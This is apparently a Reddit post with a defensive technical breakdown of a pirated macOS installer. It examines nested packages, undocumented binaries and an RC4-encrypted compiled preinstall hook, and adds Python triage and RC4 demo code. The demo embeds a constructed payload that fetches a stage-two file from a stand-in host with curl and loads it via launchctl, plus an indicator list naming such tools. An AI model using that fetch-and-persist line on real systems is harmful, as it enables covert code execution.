u/LazyMagus

▲ 3 r/Piracy

Technical breakdown of what's actually inside the Monter Group macOS installer

Monter Group is frequently cited on piracy forums as a trusted source for macOS software. This post isn't about whether that reputation is deserved. It's a layer-by-layer breakdown of what one of their installers actually contains at a technical level, so people can make an informed decision rather than relying on forum vouches alone.

The file structure

The ISO mounts as a virtual drive containing:

  • A .pkg file — the main installer
  • Several .webloc files linking to Monter Group's other releases
  • Инструкция.webloc — Russian for 'Instructions', pointing to an external online guide rather than bundling one locally

Why standard antivirus scans miss most of this

Running ClamAV directly on the ISO or the mounted volume returns almost nothing meaningful: only 4 MB scanned out of a 3.8 GB file. Two things are at work. A PKG is a xar archive whose application files sit inside a compressed Payload, so a scanner that does not unpack it is reading the container, not the contents. On top of that, ClamAV's default --max-filesize and --max-scansize limits cap how much of a multi-gigabyte image it will look at, so even the parts it could parse get skipped unless those limits are raised.

To actually reach the application files, the PKG needs to be expanded with pkgutil --expand (pkgutil --expand-full additionally unpacks the Payload archive into a plain directory tree). Once that's done, the scan reaches 232 MB of content and the full file tree becomes visible.

The SHA-256 hash of the disk image returns no results on VirusTotal: the file is entirely unknown to their database. At 3.8 GB it is also too large to upload for a full scan. A hash lookup on the container says nothing about the files inside it in any case; hashing the expanded PKG and the individual files under Scripts/ is the lookup that can actually hit.

The _runtime folder

Inside the expanded package, under Scripts/_runtime/, are the following files — none of which belong to the legitimate software being installed:

[Brand-name] Keychain Fixer v0.15 [Monter Group].pkg
[Brand-name]IPCBox [Monter Group].pkg
CCXP v5.2.4.1 [Monter Group].pkg
HDPIM.dylib
HDZIP.dylib
the_unpacker
arm64
x86_64
preinstall

Keychain-touching component — The macOS Keychain stores passwords, authentication tokens, and certificates system-wide. Whether this component goes beyond licence validation is unknown.

Three nested PKGs — More installers within the installer, each from Monter Group. Each would require another round of unpacking to inspect further.

HDPIM.dylib and HDZIP.dylib — Custom dynamic libraries, not part of the legitimate software's codebase. Purpose undocumented.

the_unpacker, arm64, x86_64 — Bare compiled binaries, built separately for Apple Silicon and Intel. No documentation of purpose.

The preinstall file — the most significant finding

In a normal macOS PKG, preinstall (like postinstall) is an executable script, almost always a shell script, which Installer runs with root privileges for a system-domain install. Shell scripts are plain text. You can read them before running anything and know exactly what they will do.

In this package, preinstall is a compiled binary executable, not a shell script.
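Repeating this triage mechanically, as an added example (not the author's tooling): the script below walks the Scripts/ tree of a package that has already been expanded with pkgutil --expand, flags install hooks whose first bytes are Mach-O magic rather than a #! line, lists nested .pkg and .dylib files for a second round of unpacking, and checks compiled hooks for the function names that shc (the "shell script compiler") leaves behind, which is the same set the strings dump below shows. The default directory name "expanded" and every file in the self-test are constructed; nothing here executes anything from the package.

```python
"""Triage the Scripts/ tree of an expanded macOS .pkg.

Added example, not the post author's tooling. Assumes the package was already
expanded with `pkgutil --expand Foo.pkg expanded/` so that expanded/Scripts/
exists. Nothing here executes anything from the package.
"""
import os
import re
import sys

# First four bytes of Mach-O files. CAFEBABE is shared with Java class files,
# but inside a pkg Scripts/ directory a universal (fat) binary is the realistic reading.
MACHO_MAGIC = {
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit (big-endian)",
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit (big-endian)",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat)",
}

# Hook names Installer runs itself; for a system-domain install they run as root.
HOOK_NAMES = {"preinstall", "postinstall", "preflight", "postflight",
              "preupgrade", "postupgrade"}

# Function names that shc leaves in the symbol table of the binaries it produces.
SHC_MARKERS = {"arc4", "key_with_file", "chkenv", "xsh"}

# Runs of printable ASCII, the same thing strings(1) extracts (minimum 3 so "xsh" is kept).
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{3,}")


def classify(path):
    """Read one file and say whether it is a #! script, a Mach-O binary or something else."""
    with open(path, "rb") as fh:
        data = fh.read()
    kind = MACHO_MAGIC.get(data[:4])
    if kind is None:
        kind = "script" if data.startswith(b"#!") else "other"
    strings = {s.decode("ascii") for s in PRINTABLE_RUN.findall(data)}
    return {
        "path": path,
        "kind": kind,
        "size": len(data),
        # The shc string set is only meaningful for a compiled file.
        "shc_like": kind.startswith("Mach-O") and SHC_MARKERS <= strings,
    }


def triage_scripts(expanded_dir):
    """Return one finding per file under Scripts/ that deserves a second look."""
    findings = []
    for root, _dirs, files in os.walk(os.path.join(expanded_dir, "Scripts")):
        for name in files:
            info = classify(os.path.join(root, name))
            lower = name.lower()
            if name in HOOK_NAMES and info["kind"] != "script":
                info["finding"] = "install hook is not a plain-text script"
            elif lower.endswith(".pkg"):
                info["finding"] = "nested installer: expand and triage it separately"
            elif lower.endswith(".dylib"):
                info["finding"] = "dynamic library shipped with the install scripts"
            elif info["kind"].startswith("Mach-O"):
                info["finding"] = "compiled binary shipped with the install scripts"
            else:
                continue  # plain scripts and data files: read them, but no flag
            findings.append(info)
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    for f in triage_scripts(sys.argv[1] if len(sys.argv) > 1 else "expanded"):
        tag = " (shc-style wrapper)" if f["shc_like"] else ""
        print(f"{f['path']}: {f['kind']}, {f['size']} bytes: {f['finding']}{tag}")
```

Run it as `python3 triage.py expanded/` after `pkgutil --expand`. A hook that classifies as a script still has to be read; the point of the tool is to make sure a compiled one cannot slip past as "just another script".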

Dumping its embedded strings shows the following function names:

arc4
key
key_with_file
chkenv
xsh
execvp
getenv
putenv
environ
getpid

What these indicate:

  • arc4 — RC4 stream cipher. The binary contains an encryption/decryption routine.
  • key / key_with_file — RC4 key setup. The name suggests key material tied to another file; in shc (see below) the key is compiled into the binary and key_with_file mixes in stat() metadata of the shell interpreter, so there is no separate key file in the package to read.
  • chkenv / xsh — an environment check and the routine that decrypts the payload and hands it to a shell.
  • execvp — It executes a child process.
  • getenv / putenv — It reads and modifies environment variables.

Taken together, arc4, key, key_with_file, chkenv and xsh are exactly the function names that shc, the "shell script compiler", leaves in the binaries it produces: shc takes a shell script, stores it RC4-encrypted inside a small C program, and at run time decrypts it and execs the shell with the recovered script. That is the most likely reading of this preinstall, although the same names could in principle be produced by hand.

In plain terms: this binary runs with root privileges at install time, decrypts a script that does not exist in readable form anywhere on disk, and executes it.

This is why signature scanning finds nothing. The actual behaviour of the installer is not present in any file that a scanner can match against; it only materialises at runtime, after the binary has already been handed root access to your system. That is not the same as being unrecoverable: an shc-style wrapper carries its own key material, so the script can be decrypted offline by someone willing to reverse engineer the hook. A scan alone will never show it.
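What "hidden until runtime" means for a scanner, and what it does not mean, as an added example that is not code from the post or from Monter Group. A constructed sample shell script is RC4-encrypted the way a simplified shc-style wrapper stores it; a plain indicator scan over the stored blob finds nothing, while the same scan over the decrypted bytes does. The key and the sample script are constructed values, and shc's real key derivation (compiled-in password plus stat() mixing) is not reproduced; the point is that when key material lives in or beside the binary, the plaintext can be recovered offline without ever running the installer. RC4 is written out because it is the cipher the strings name.

```python
"""RC4-wrapped payload versus signature scanning.

Added example, not the post's or Monter Group's code. The sample script and key
are constructed for the demo; nothing here is executed.
"""

# A constructed stand-in for the shell script an shc-style wrapper would carry.
SAMPLE_SCRIPT = (
    b"#!/bin/sh\n"
    b"# constructed sample, not recovered from any real installer\n"
    b"curl -fsSL https://example.invalid/stage2 -o /tmp/stage2\n"
    b"launchctl load /tmp/stage2.plist\n"
)
SAMPLE_KEY = b"constructed-demo-key"  # constructed; not a real key from any binary

# Strings a reviewer would grep for in an install hook.
INDICATORS = [b"#!/bin/sh", b"curl", b"launchctl", b"security ", b"sudo"]


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:  # pseudo-random generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def scan(data: bytes, indicators=INDICATORS) -> set:
    """Naive signature scan: which indicator strings occur verbatim in the bytes."""
    return {ind for ind in indicators if ind in data}


def build_wrapped_blob(script: bytes = SAMPLE_SCRIPT, key: bytes = SAMPLE_KEY) -> bytes:
    """What the wrapper stores on disk: only the RC4 ciphertext of the script."""
    return rc4(key, script)


def recover_payload(blob: bytes, key: bytes) -> bytes:
    """Offline recovery: with the key, the plaintext comes back without running anything.

    A wrong key yields noise rather than a script, which the #! check catches."""
    plain = rc4(key, blob)
    if not plain.startswith(b"#!"):
        raise ValueError("decryption did not yield a script; wrong key or layout")
    return plain


if __name__ == "__main__":
    blob = build_wrapped_blob()
    print("indicators in stored blob:   ", sorted(scan(blob)))
    print("indicators after decryption: ", sorted(scan(recover_payload(blob, SAMPLE_KEY))))
```

The stored blob carries none of the strings a scanner or a grep would look for, which is the whole point of the wrapper; the same bytes run through RC4 with the right key give back the script, and that is the step a scanner never performs but an analyst can.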

Why this matters

A legitimate installer has no reason to:

  • Use a compiled binary instead of a shell script for its preinstall hook
  • Embed a cryptographic cipher
  • Decrypt and execute a hidden payload at runtime

These are techniques for keeping what a script does away from anyone reading it, scanners included. A vendor shipping its own software gains nothing from them. A repackager who wants a patching or licence-bypass script kept out of sight does, and so does anyone bundling something worse; from the outside the two look identical.

This does not prove the installer is malicious. It proves that no scanner can tell you what it does, because the relevant code is hidden until the moment it runs with root privileges on your machine. Finding out means reverse engineering the hook, or running the installer in a disposable VM and watching what it actually touches.

Forum users reporting no issues after installation is not evidence of safety — it is evidence that nothing obviously broke. Those are different things.

Summary

What was checked                          Result
----------------------------------------  -----------------------------------------------------------
ClamAV scan of ISO / mounted volume       Effectively 0 bytes of application content scanned
ClamAV scan of expanded PKG               232 MB scanned, 0 detections
VirusTotal hash lookup                    File completely unknown
VirusTotal direct upload                  Not possible — file too large
preinstall script                         Compiled binary, not a shell script
preinstall content                        RC4 cipher, runtime decryption, child process execution
Custom dylibs and binaries                Undocumented, not part of the legitimate software's codebase
Keychain-touching component               Present

Make of that what you will.

u/LazyMagus — 4 days ago